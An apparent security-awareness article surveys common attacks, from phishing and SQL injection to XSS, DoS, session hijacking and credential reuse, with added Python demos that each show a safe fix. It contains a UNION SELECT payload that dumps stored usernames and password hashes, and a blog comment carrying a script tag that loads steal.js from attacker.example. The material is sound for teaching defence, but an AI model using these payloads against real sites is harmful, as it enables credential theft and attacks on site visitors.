At a Glance:
If you've ever studied famous battles in history, you'll know that no two are exactly alike. Still, there are similar strategies and tactics often used in battle because they are time-proven to be effective. Similarly, when a criminal is trying to hack an organization, they won't re-invent the wheel unless they absolutely have to: They'll draw upon a common arsenal of attacks that are known to be highly effective. Whether you're trying to make sense of the latest data breach headline in the news or analyzing an incident in your own organization, it helps to understand the different ways an attacker might try to cause harm. Here’s an overview of some of the most common types of attacks seen today.
Malware
If you've ever seen an antivirus alert pop up on your
screen, or if you've mistakenly clicked a malicious email attachment,
then you've had a close call with malware. Attackers love to use malware
to gain a foothold in users' computers—and, consequently, the offices
they work in—because it can be so effective.
“Malware” refers to various forms of harmful software, such as viruses and ransomware.
Once malware is in your computer, it can wreak all sorts of havoc, from
taking control of your machine, to monitoring your actions and
keystrokes, to silently sending all sorts of confidential data from your
computer or network to the attacker's home base.
Attackers will use a variety of methods to get malware
into your computer, but at some stage it often requires the user to take
an action to install the malware. This can include clicking a link to
download a file, or opening an attachment that may look harmless (like a
Word document or PDF attachment), but actually has a malware installer
hidden within.
Phishing
Of course, chances are you wouldn't just open a random
attachment or click on a link in any email that comes your way—there has
to be a compelling reason for you to take action. Attackers know this,
too. When an attacker wants you to install malware or divulge sensitive
information, they often turn to phishing tactics, or pretending to be
someone or something else to get you to take an action you normally
wouldn’t. Since they rely on human curiosity and impulses, phishing
attacks can be difficult to stop.
In a phishing attack, an attacker may send you an email
that appears to be from someone you trust, like your boss or a company
you do business with. The email will seem legitimate, and it will have
some urgency to it (e.g. fraudulent activity has been detected on your
account). In the email, there will be an attachment to open or a link to
click. Opening the malicious attachment installs the malware on your
computer. If you click the link, it may send you to a
legitimate-looking website that asks for you to log in to access an
important file—except the website is actually a trap used to capture
your credentials when you try to log in.
To combat phishing attempts, it is essential to understand the
importance of verifying email senders and any attachments or links
before acting on them.
SQL Injection Attack
SQL (pronounced “sequel”) stands for structured query
language; it’s the language used to query and manage relational
databases. Many of the servers that store critical data for websites and
services use SQL to manage the data in their databases. A SQL injection
attack specifically targets this kind of server, using malicious code
to get the server to divulge information it normally wouldn’t. This is
especially problematic if the server stores private customer information
from the website, such as credit card numbers, usernames and passwords
(credentials), or other personally identifiable information, which are
tempting and lucrative targets for an attacker.
An SQL injection attack works by exploiting a flaw in the way a website
builds its database queries: if the site pastes what a user typed straight
into the SQL it sends to the server, the server cannot tell the query from
the input and runs the attacker's text as part of the query. For example,
if a site's search feature is built this way, it may be possible for an
attacker to type into the search box text that forces the site's SQL
server to dump all of its stored usernames and passwords for the site.
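As an added example (not code from the original article), here is the search-box scenario above in Python with SQLite: a constructed in-memory database, a search function that pastes the term into the SQL text, and the parameterized version that keeps the term as data. The table and column names are assumptions.

```python
import sqlite3


def make_db():
    # Constructed in-memory database standing in for a site's data store.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "hash-a"), ("bob", "hash-b")])
    db.execute("CREATE TABLE products (name TEXT)")
    db.executemany("INSERT INTO products VALUES (?)",
                   [("widget",), ("gadget",)])
    db.commit()
    return db


def search_vulnerable(db, term):
    # The search term is pasted straight into the SQL text, so the database
    # cannot tell where the query ends and the user's input begins.
    sql = f"SELECT name FROM products WHERE name LIKE '%{term}%'"
    return [row[0] for row in db.execute(sql)]


def search_safe(db, term):
    # A parameterized query sends the SQL and the value separately; the
    # value is only ever treated as data, never as part of the query.
    sql = "SELECT name FROM products WHERE name LIKE ?"
    return [row[0] for row in db.execute(sql, (f"%{term}%",))]


# The kind of search-box input the text describes: it closes the quoted
# string and appends a second query that reads the users table.
DUMP_TERM = "' UNION SELECT username || ':' || password_hash FROM users --"


def demo():
    db = make_db()
    # Vulnerable: product names plus every username and password hash.
    leaked = search_vulnerable(db, DUMP_TERM)
    # Safe: the same text is just a (non-matching) search term.
    safe = search_safe(db, DUMP_TERM)
    return leaked, safe
```

The vulnerable function returns the users' credentials alongside the product names, while the parameterized one returns an empty list for the same input.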
Cross-Site Scripting (XSS)
In an SQL injection attack, an attacker goes after a
vulnerable website to target its stored data, such as user credentials
or sensitive financial data. But if the attacker would rather directly
target a website's users, they may opt for a cross-site scripting
attack. Similar to an SQL injection attack, this attack also involves
injecting malicious code into a website, but in this case the website
itself is not being attacked. Instead, the malicious code the attacker
has injected only runs in the user's browser when they visit the
attacked website, and it goes after the visitor directly, not the
website.
One of the most common ways an attacker can deploy a
cross-site scripting attack is by injecting malicious code into a
comment or a script that could automatically run. For example, they
could embed a link to a malicious JavaScript file in a comment on a blog.
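An added example, not part of the original article, showing the blog-comment case in Python: the same constructed comments are rendered once by pasting them into the page and once through html.escape, which is what stops the embedded script tag from being executed by a visitor's browser. The attacker.example domain is a constructed placeholder.

```python
import html

# Constructed blog comments standing in for what users submitted. The
# second one carries the script tag that loads an external JavaScript file.
COMMENTS = [
    "Great post, thanks!",
    '<script src="https://attacker.example/steal.js"></script>',
]


def render_comment_vulnerable(comment):
    # Interpolates the raw comment into the HTML; a browser receiving this
    # page would load and run the referenced script for every visitor.
    return f'<li class="comment">{comment}</li>'


def render_comment_safe(comment):
    # html.escape turns <, >, &, " and ' into entities, so the browser
    # displays the comment text literally instead of parsing it as markup.
    return f'<li class="comment">{html.escape(comment)}</li>'


def render_page(comments, renderer):
    # Builds the comment list the way a simple blog template would.
    return "<ul>" + "".join(renderer(c) for c in comments) + "</ul>"


def contains_live_script(page_html):
    # Crude review check on rendered output: is there a real <script> tag?
    return "<script" in page_html.lower()
```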
Cross-site scripting attacks can significantly damage a
website’s reputation by placing the users' information at risk without
any indication that anything malicious even occurred. Any sensitive
information a user sends to the site—such as their credentials, credit
card information, or other private data—can be hijacked via cross-site
scripting without the website owners realizing there was even a problem
in the first place.
Denial of Service (DoS)
Imagine you're sitting in traffic on a one-lane country
road, with cars backed up as far as the eye can see. Normally this road
never sees more than a car or two, but a county fair and a major
sporting event have ended around the same time, and this road is the
only way for visitors to leave town. The road can't handle the massive
amount of traffic, and as a result it gets so backed up that pretty much
no one can leave.
That's essentially what happens to a website during a denial of service
(DoS) attack. If you flood a website with more traffic than it was
built to handle, you'll overload the website's server and it'll be
nigh-impossible for the website to serve up its content to visitors who
are trying to access it.
This can happen for innocuous reasons of course, say if a
massive news story breaks and a newspaper's website gets overloaded
with traffic from people trying to find out more. But often, this kind
of traffic overload is malicious, as an attacker floods a website with an overwhelming amount of traffic to essentially shut it down for all users.
In some instances, these DoS attacks are performed by
many computers at the same time. This is known as a
Distributed Denial of Service (DDoS) attack. It can be
even more difficult to overcome because the traffic arrives from many
different IP addresses around the world simultaneously, which makes
determining the source of the attack even harder for network
administrators.
Session Hijacking and Man-in-the-Middle Attacks
When you're on the internet, your computer has a lot of
small back-and-forth transactions with servers around the world letting
them know who you are and requesting specific websites or services. In
return, if everything goes as it should, the web servers should respond
to your request by giving you the information you're accessing. This
process, or session, happens whether you are simply browsing or when you
are logging into a website with your username and password.
The session between your computer and the remote web
server is given a unique session ID, which should stay private between
the two parties; however, an attacker can hijack the session by
capturing the session ID and posing as the computer making a request,
allowing them to log in as an unsuspecting user and gain access to
unauthorized information on the web server. There are a number of
methods an attacker can use to steal the session ID, including the
cross-site scripting attack described above.
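An added example (not the article's own code) of how a server can issue session IDs so that the ID stays private between the two parties: the ID is generated from the OS random source, and the Set-Cookie header marks it HttpOnly, the flag that keeps scripts injected into the page, as in the cross-site scripting theft the text mentions, from reading it. The Secure and SameSite attributes, the cookie name sid and the in-memory session store are assumptions.

```python
import secrets
from http.cookies import SimpleCookie

# Constructed in-memory store: session ID -> username.
SESSIONS = {}


def start_session(username):
    # 32 random bytes from the OS CSPRNG: an ID this long cannot be guessed,
    # so the only way for an attacker to obtain it is to capture it.
    session_id = secrets.token_urlsafe(32)
    SESSIONS[session_id] = username
    return session_id


def session_cookie_header(session_id):
    # HttpOnly keeps the ID out of reach of JavaScript running in the page;
    # Secure restricts it to HTTPS so it is not exposed to someone sitting
    # between the browser and the server; SameSite=Strict stops other
    # sites from making the browser send it along with their requests.
    cookie = SimpleCookie()
    cookie["sid"] = session_id
    cookie["sid"]["httponly"] = True
    cookie["sid"]["secure"] = True
    cookie["sid"]["samesite"] = "Strict"
    cookie["sid"]["path"] = "/"
    return cookie["sid"].OutputString()


def cookie_is_hardened(header):
    # Review check on a Set-Cookie value: are all three attributes present?
    attrs = {part.strip().split("=")[0].lower() for part in header.split(";")}
    return {"httponly", "secure", "samesite"} <= attrs


def user_for(session_id):
    # Whoever presents the ID is treated as that user. This is exactly why
    # the ID must stay private, and why sessions must end on logout.
    return SESSIONS.get(session_id)


def end_session(session_id):
    SESSIONS.pop(session_id, None)
```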
An attacker can also opt to hijack the session to insert
themselves between the requesting computer and the remote server,
pretending to be the other party in the session. This allows them to
intercept information in both directions and is commonly called a
man-in-the-middle attack.
Credential Reuse
Users today have so many logins and passwords to
remember that it’s tempting to reuse credentials here or there to make
life a little easier. Even though security best practices universally
recommend that you have unique passwords for all your applications and
websites, many people still reuse their passwords—a fact attackers rely
on.
Once attackers have a collection of usernames and
passwords from a breached website or service (easily acquired on any
number of black market websites on the internet), they know that if they
use these same credentials on other websites there’s a chance they’ll
be able to log in. No matter how tempting it may be to reuse credentials
for your email, bank account, and your favorite sports forum, it’s
possible that one day the forum will get hacked, giving an attacker easy
access to your email and bank account. When it comes to credentials,
variety is essential. Password managers are available and can be helpful
when it comes to managing the various credentials you use.
This is just a selection of common attack types and techniques. It is
not intended to be exhaustive, and attackers do evolve and develop new
methods as needed; however, being aware of and mitigating these types
of attacks will significantly improve your security posture.